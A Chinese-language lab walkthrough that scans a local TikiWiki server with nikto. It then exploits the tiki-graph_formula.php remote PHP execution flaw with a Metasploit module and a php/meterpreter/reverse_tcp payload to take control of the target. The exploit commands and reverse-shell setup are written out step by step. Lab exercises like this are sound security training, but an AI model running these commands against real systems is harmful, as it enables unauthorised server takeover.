什么是TikiWiki
TikiWiki 是一个强大的基于Web的协作工具。TikiWiki内置了很多功能选项,当您需要某个功能时可以很方便的将该功能激活。TikiWiki的设计架构是面向全世界范围的、清爽以及易扩展的。TikiWiki除了拥有当前几个优秀的Wiki的所有功能外,并且还提供很多其他很有价值的功能。您可以通过 TikiWiki构建成论坛系统、聊天室、投票系统、客户支持网站等。

使用nikto web漏洞扫描
Nikto是一款开源的网页web服务器,它可以对网页服务器进行全面的多种扫描,包含超过3300种有潜在危险的文件/CGIs,超过625种服务器版本,超过230种特定服务器问题。这是一款非常棒的工具。
测试环境:
Kali 攻击机 192.168.31.251
Ubuntu 靶机 192.168.31.164
Nikto kali自带
扫描ubuntu的web服务器
Kali终端下,输入:
nikto -h 192.168.31.164,扫描如下

分析:红色部分说明,存在tikiwiki路径,这是一个web应用的程序的网址。tiki-graph_formula.php这个php类型的网址被发现,其实这个网址执行的时候存在允许恶意脚本代码执行的漏洞!后面的”allows remote attackers to execute arbitrary PHP code“这一行也说明了存在远程php代码执行漏洞攻击!
tikiwiki漏洞利用
我们这里使用metasploit渗透利用框架!
开启metasploit
搜索”tiki-graph_formula.php”exploit(利用模块)
配置该exploit模块的参数
接下来配置监听回连的php载荷
执行,获取meterpreter会话,控制ubuntu靶机
Metasploit下:
msf5 > search tiki-graph_formula.php
use exploit/unix/webapp/tikiwiki_graph_formula_exec
show options (查看设置选项)

set RHOST 192.168.31.164
设置ubuntu的目标ip
set payload php/meterpreter/reverse_tcp
设置kali在接收回连后发送到目标的php载荷
run (执行)

相信已经看到了meterpreter会话,接下来可以使用 “?”查看可以用于控制ubuntu的命令了:
比如:操作文件系统的命令

比如:查看对方网络、使用系统命令控制靶机等
总的来说,对于渗透者来说,这些命令够用了!

到目前为止,我们通过web应用tikiwiki的一个网址存在的graph_formula.php脚本代码执行漏洞,成功拿下了目标linux的服务器权限!